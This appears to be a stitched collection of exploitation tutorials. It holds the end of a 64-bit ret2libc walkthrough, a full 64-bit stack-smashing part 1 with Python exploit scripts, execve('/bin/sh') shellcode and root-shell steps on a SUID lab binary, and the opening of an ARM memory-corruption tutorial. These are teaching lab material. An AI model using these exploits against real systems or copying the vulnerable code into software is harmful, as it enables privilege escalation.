0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system()

gdb-peda$ si
.
.
.
[-------------------------------------code-------------------------------------]
   0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
   0x7ffff7a5ac36 <cancel_handler+182>: ret
   0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
   0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
   0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
   0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3

At this point if we just continue execution we should see that “/bin/sh” is executed:

gdb-peda$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

koji@pwnbox:~/ret2libc$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc$ sudo chmod 4755 ret2libc

Now let’s execute our exploit much like we did in part 1:

koji@pwnbox:~/ret2libc$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
whoami
root

Got our root shell again, and we bypassed NX. Now this was a relatively simple exploit that only required one parameter. What if we need more? Then we need to find more gadgets that setup the registers accordingly before returning to a function in libc. If you’re up for a challenge, rewrite the exploit so that it calls execve() instead of system(). execve() requires three parameters:

int execve(const char *filename, char *const argv[], char *const envp[]);

This means you’ll need to have RDI, RSI, and RDX populated with proper values before calling execve(). Try to use gadgets only within the binary itself, that is, don’t look for gadgets in libc.

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.

Setup

Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")
f.write(buf)

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKA\220\001\n")
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RSP: 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 ("A7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6"...)
0008| 0x7fffffffe510 ("AA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%"...)
0016| 0x7fffffffe518 ("jAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA"...)
0024| 0x7fffffffe520 ("AkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%j"...)
0032| 0x7fffffffe528 ("AAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%"...)
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)
[------------------------------------------------------------------------------]

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")
f.write(buf)

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
Read 400 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x424242424242
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")
f.write(buf)

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
Read 112 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAp
No shell for you :(
whoami
root

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

ARM PROCESS MEMORY AND MEMORY CORRUPTIONS

PROCESS MEMORY AND MEMORY CORRUPTIONS

The prerequisite for this part of the tutorial is a basic understanding of ARM assembly (covered in the first tutorial series “ARM Assembly Basics“). In this chapter you will get an introduction into the memory layout of a process in a 32-bit Linux environment. After that you will learn the fundamentals of Stack and Heap related memory corruptions and how they look like in a debugger.

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer
  3. Format String

The examples used in this tutorial are compiled on an ARMv6 32-bit processor. If you don’t have access to an ARM device, you can create your own lab and emulate a Raspberry Pi distro in a VM by following this tutorial: Emulate Raspberry Pi with QEMU. The debugger used here is GDB with GEF (GDB Enhanced Features). If you aren’t familiar with these tools, you can check out this tutorial: Debugging with GDB and GEF.

MEMORY LAYOUT OF A PROCESS

Every time we start a program, a memory area for that program is reserved. This area is then split into multiple regions. Those regions are then split into even more regions (segments), but we will stick with the general overview. So, the parts we are interested are:

  1. Program Image
  2. Heap
  3. Stack

In the picture below we can see a general representation of how those parts are laid out within the process memory. The addresses used to specify memory regions are just for the sake of an example, because they will differ from environment to environment, especially when ASLR is used.

Program Image region basically holds the program’s executable file which got loaded into the memory. This memory region can be split into various segments: .plt, .text, .got, .data, .bss and so on. These are the most relevant. For example, .text contains the executable part of the program with all the Assembly instructions, .data and .bss holds the variables or pointers to variables used in the application, .plt and .got stores specific pointers to various imported functions from, for example, shared libraries. From a security standpoint, if an attacker could affect the integrity (rewrite) of the .text section, he could execute arbitrary code. Similarly, corruption of Procedure Linkage Table (.plt) and Global Offsets Table (.got) could under specific circumstances lead to execution of arbitrary code.

The Stack and Heap regions are used by the application to store and operate on temporary data (variables) that are used during the execution of the program. These regions are commonly exploited by attackers, because data in the Stack and Heap regions can often be modified by the user’s input, which, if not handled properly, can cause a memory corruption. We will look into such cases later in this chapter.

In addition to the mapping of the memory, we need to be aware of the attributes associated with different memory regions. A memory region can have one or a combination of the following attributes: Read, Write, eXecute. The Read attribute allows the program to read data from a specific region. Similarly, Write allows the program to write data into a specific memory region, and Execute – execute instructions in that memory region. We can see the process memory regions in GEF (a highly recommended extension for GDB) as shown below:

azeria@labs:~/exp $ gdb program
...
gef> gef config context.layout "code"
gef> break main
Breakpoint 1 at 0x104c4: file program.c, line 6.
gef> run
...
gef> nexti 2
-----------------------------------------------------------------------------------------[ code:arm ]----
...
      0x104c4 <main+20>        mov    r0,  #8
      0x104c8 <main+24>        bl     0x1034c <malloc@plt>
->    0x104cc <main+28>        mov    r3,  r0
      0x104d0 <main+32>        str    r3,  [r11,  #-8]
...
gef> vmmap
Start      End        Offset     Perm Path
0x00010000 0x00011000 0x00000000 r-x /home/azeria/exp/program <---- Program Image
0x00020000 0x00021000 0x00000000 rw- /home/azeria/exp/program <---- Program Image continues...
0x00021000 0x00042000 0x00000000 rw- [heap] <---- HEAP
0xb6e74000 0xb6f9f000 0x00000000 r-x /lib/arm-linux-gnueabihf/libc-2.19.so <---- Shared library (libc)
0xb6f9f000 0xb6faf000 0x0012b000 --- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6faf000 0xb6fb1000 0x0012b000 r-- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb1000 0xb6fb2000 0x0012d000 rw- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb2000 0xb6fb5000 0x00000000 rw-
0xb6fcc000 0xb6fec000 0x00000000 r-x /lib/arm-linux-gnueabihf/ld-2.19.so <---- Shared library (ld)
0xb6ffa000 0xb6ffb000 0x00000000 rw-
0xb6ffb000 0xb6ffc000 0x0001f000 r-- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffc000 0xb6ffd000 0x00020000 rw- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffd000 0xb6fff000 0x00000000 rw-
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rw- [stack] <---- STACK
0xffff0000 0xffff1000 0x00000000 r-x [vectors]

The Heap section in the vmmap command output appears only after some Heap related function was used. In this case we see the malloc function being used to create a buffer in the Heap region. So if you want to try this out, you would need to debug a program that makes a malloc call (you can find some examples in this page, scroll down or use find function).

Additionally, in Linux we can inspect the process’ memory layout by accessing a process-specific “file”:

azeria@labs:~/exp $ ps aux | grep program
azeria   31661 12.3 12.1  38680 30756 pts/0    S+   23:04   0:10 gdb program
azeria   31665  0.1  0.2   1712   748 pts/0    t    23:04   0:00 /home/azeria/exp/program
azeria   31670  0.0  0.7   4180  1876 pts/1    S+   23:05   0:00 grep --color=auto program
azeria@labs:~/exp $ cat /proc/31665/maps
00010000-00011000 r-xp 00000000 08:02 274721     /home/azeria/exp/program
00020000-00021000 rw-p 00000000 08:02 274721     /home/azeria/exp/program
00021000-00042000 rw-p 00000000 00:00 0          [heap]
b6e74000-b6f9f000 r-xp 00000000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6f9f000-b6faf000 ---p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6faf000-b6fb1000 r--p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb1000-b6fb2000 rw-p 0012d000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb2000-b6fb5000 rw-p 00000000 00:00 0
b6fcc000-b6fec000 r-xp 00000000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffa000-b6ffb000 rw-p 00000000 00:00 0
b6ffb000-b6ffc000 r--p 0001f000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffc000-b6ffd000 rw-p 00020000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffd000-b6fff000 rw-p 00000000 00:00 0
b6fff000-b7000000 r-xp 00000000 00:00 0          [sigpage]
befdf000-bf000000 rw-p 00000000 00:00 0          [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]

Most programs are compiled in a way that they use shared libraries. Those libraries are not part of the program image (even though it is possible to include them via static linking) and therefore have to be referenced (included) dynamically. As a result, we see the libraries (libc, ld, etc.) being loaded in the memory layout of a process. Roughly speaking, the shared libraries are loaded somewhere in the memory (outside of process’ control) and our program just creates virtual “links” to that memory region. This way we save memory without the need to load the same library in every instance of a program.

INTRODUCTION INTO MEMORY CORRUPTIONS

A memory corruption is a software bug type that allows to modify the memory in a way that was not intended by the programmer. In most cases, this condition can be exploited to execute arbitrary code, disable security mechanisms, etc. This is done by crafting and injecting a payload which alters certain memory sections of a running program. The following list contains the most common memory corruption types/vulnerabilities:

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer (Use-after-free)
  3. Format String

In this chapter we will try to get familiar with the basics of Buffer Overflow memory corruption vulnerabilities (the remaining ones will be covered in the next chapter). In the examples we are about to cover we will see that the main cause of memory corruption vulnerabilities is an improper user input validation, sometimes combined with a logical flaw. For a program, the input (or a malicious payload) might come in a form of a username, file to be opened, network packet, etc. and can often be influenced by the user. If a programmer did not put safety measures for potentially harmful user input it is often the case that the target program will be subject to some kind of memory related issue.

BUFFER OVERFLOWS

Buffer overflows are one of the most widespread memory corruption classes and are usually caused by a programming mistake which allows the user to supply more data than there is available for the destination variable (buffer). This happens, for example, when vulnerable functions, such as getsstrcpymemcpy or others are used along with data supplied by the user. These functions do not check the length of the user’s data which can result into writing past (overflowing) the allocated buffer. To get a better understanding, we will look into basics of Stack and Heap based buffer overflows.

Stack Overflow

Stack overflow, as the name suggests, is a memory corruption affecting the Stack. While in most cases arbitrary corruption of the Stack would most likely result in a program’s crash, a carefully crafted Stack buffer overflow can lead to arbitrary code execution. The following picture shows an abstract overview of how the Stack can get corrupted.

As you can see in the picture above, the Stack frame (a small part of the whole Stack dedicated for a specific function) can have various components: user data, previous Frame Pointer, previous Link Register, etc. In case the user provides too much of data for a controlled variable, the FP and LR fields might get overwritten. This breaks the execution of the program, because the user corrupts the address where the application will return/jump after the current function is finished.

To check how it looks like in practice we can use this example:

/*azeria@labs:~/exp $ gcc stack.c -o stack*/
#include "stdio.h"

int main(int argc, char **argv)
{
char buffer[8];
gets(buffer);
}

Our sample program uses the variable “buffer”, with the length of 8 characters, and a function “gets” for user’s input, which simply sets the value of the variable “buffer” to whatever input the user provides. The disassembled code of this program looks like the following:

Here we suspect that a memory corruption could happen right after the function “gets” is completed. To investigate this, we place a break-point right after the branch instruction that calls the “gets” function – in our case, at address 0x0001043c. To reduce the noise we configure GEF’s layout to show us only the code and the Stack (see the command in the picture below). Once the break-point is set, we proceed with the program and provide 7 A’s as the user’s input (we use 7 A’s, because a null-byte will be automatically appended by function “gets”).

When we investigate the Stack of our example we see (image above) that the Stack frame is not corrupted. This is because the input supplied by the user fits in the expected 8 byte buffer and the previous FP and LR values within the Stack frame are not corrupted. Now let’s provide 16 A’s and see what happens.

In the second example we see (image above) that when we provide too much of data for the function “gets”, it does not stop at the boundaries of the target buffer and keeps writing “down the Stack”. This causes our previous FP and LR values to be corrupted. When we continue running the program, the program crashes (causes a “Segmentation fault”), because during the epilogue of the current function the previous values of FP and LR are “poped” off the Stack into R11 and PC registers forcing the program to jump to address 0x41414140 (last byte gets automatically converted to 0x40 because of the switch to Thumb mode), which in this case is an illegal address. The picture below shows us the values of the registers (take a look at $pc) at the time of the crash.

Heap Overflow

First of all, Heap is a more complicated memory location, mainly because of the way it is managed. To keep things simple, we stick with the fact that every object placed in the Heap memory section is “packed” into a “chunk” having two parts: header and user data (which sometimes the user controls fully). In the Heap’s case, the memory corruption happens when the user is able to write more data than is expected. In that case, the corruption might happen within the chunk’s boundaries (intra-chunk Heap overflow), or across the boundaries of two (or more) chunks (inter-chunk Heap overflow). To put things in perspective, let’s take a look at the following illustration.

As shown in the illustration above, the intra-chunk heap overflow happens when the user has the ability to supply more data to u_data_1and cross the boundary between u_data_1 and u_data_2. In this way the fields/properties of the current object get corrupted. If the user supplies more data than the current Heap chunk can accommodate, then the overflow becomes inter-chunk and results into a corruption of the adjacent chunk(s).

Intra-chunk Heap overflow

To illustrate how an intra-chunk Heap overflow looks like in practice we can use the following example and compile it with “-O” (optimization flag) to have a smaller (binary) program (easier to look through).

/*azeria@labs:~/exp $ gcc intra_chunk.c -o intra_chunk -O*/
#include "stdlib.h"
#include "stdio.h"

struct u_data                                          //object model: 8 bytes for name, 4 bytes for number
{
 char name[8];
 int number;
};

int main ( int argc, char* argv[] )
{
 struct u_data* objA = malloc(sizeof(struct u_data)); //create object in Heap

 objA->number = 1234;                                 //set the number of our object to a static value
 gets(objA->name);                                    //set name of our object according to user's input

 if(objA->number == 1234)                             //check if static value is intact
 {
  puts("Memory valid");
 }
 else                                                 //proceed here in case the static value gets corrupted
 {
  puts("Memory corrupted");
 }
}

The program above does the following:

  1. Defines a data structure (u_data) with two fields
  2. Creates an object (in the Heap memory region) of type u_data
  3. Assigns a static value to the number’s field of the object
  4. Prompts user to supply a value for the name’s field of the object
  5. Prints a string depending on the value of the number’s field

So in this case we also suspect that the corruption might happen after the function “gets”. We disassemble the target program’s main function to get the address for a break-point.

In this case we set the break-point at address 0x00010498 – right after the function “gets” is completed. We configure GEF to show us the code only. We then run the program and provide 7 A’s as a user input.

Once the break-point is hit, we quickly lookup the memory layout of our program to find where our Heap is. We use vmmap command and see that our Heap starts at the address 0x00021000. Given the fact that our object (objA) is the first and the only one created by the program, we start analyzing the Heap right from the beginning.

